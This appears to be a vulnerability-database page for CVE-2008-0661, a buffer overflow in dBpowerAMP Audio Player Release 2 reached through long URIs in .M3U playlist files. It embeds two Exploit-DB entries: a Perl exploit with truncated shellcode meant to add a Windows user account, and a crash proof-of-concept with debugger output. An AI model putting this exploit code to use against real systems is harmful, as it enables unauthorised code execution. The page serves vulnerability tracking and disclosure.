CVE-2008-0661
published 2008-02-08CVE-2008-0661: Buffer overflow in dBpowerAMP Audio Player Release 2 allows remote attackers to execute arbitrary code via a .M3U file with a long URI. NOTE: this might be the…
PriorityP432medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
4.79%
90.8th percentile
Buffer overflow in dBpowerAMP Audio Player Release 2 allows remote attackers to execute arbitrary code via a .M3U file with a long URI. NOTE: this might be the same issue as CVE-2004-1569.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| illustrate | dbpoweramp_audio_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow
exploitdb·2008-02-06
CVE-2008-0661 dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow
dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow
---
####################################################################
#
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit
#
#
#
#
#
#
#
$nop= "\x90" x 65;
#
# win32_exec - CMD=cmd /k net user /add secur frog Size=188 http://metasploit.comhttp://metasploit.com 253
#
my $shellcode =
"\x29\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c".
"\x91\xfa\x54\x83\xeb\xfc\xe2\xf4\x90\x79\xbe\x54\x6c\x91\x71\x11".
"\x50\x1a\x86\x51\x14\x90\x15\xdf\x23\x89\x71\x0b\x4c\x90\x11\x1d".
"\xe7\xa5\x71\x55\x82\xa0\x3a\xcd\xc0\x15\x3a\x20\x6b\x50\x30\x59".
"\x6d\x53\x11\xa0\x57\xc5\xde\x50\x19\x74\x71\x0b\x48\x90\x11\x32".
"\xe7\x9d\xb1\xdf\x33\x8d\xfb\xbf\xe7\x8d\x71\x55\x87\x18\xa6\x70".
"\x68\x52\xcb\x94\x08\x1a\xba\
Exploit-DB
dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)
exploitdb·2008-02-05
CVE-2008-0661 dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)
dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)
---
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow
# 0:002> r
# eax=00000000 ebx=77c17a50 ecx=00000000 edx=00000107 esi=00000000 edi=00b8f217
# eip=00004141 esp=00b8ede0 ebp=77c0f931 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# 00004141 ?? ???
# EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
# ExceptionAddress: 00004141
# ExceptionCode: c0000005 (Access violation)
# ExceptionFlags: 00000000
# NumberParameters: 2
# Parameter[0]: 00000000
# Parameter[1]: 00004141
# Attempt to read from address 00004141
#
# PoC :
#
my $file="bob_marley_I_Shot_The_Sheriff.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 255;
close($FILE);
No writeups or analysis indexed.
http://securityreason.com/securityalert/3623http://www.securityfocus.com/archive/1/487605/100/0/threadedhttp://www.securityfocus.com/bid/27635http://www.securityfocus.com/bid/27639https://www.exploit-db.com/exploits/5067https://www.exploit-db.com/exploits/5069http://securityreason.com/securityalert/3623http://www.securityfocus.com/archive/1/487605/100/0/threadedhttp://www.securityfocus.com/bid/27635http://www.securityfocus.com/bid/27639https://www.exploit-db.com/exploits/5067https://www.exploit-db.com/exploits/5069
2008-02-08
Published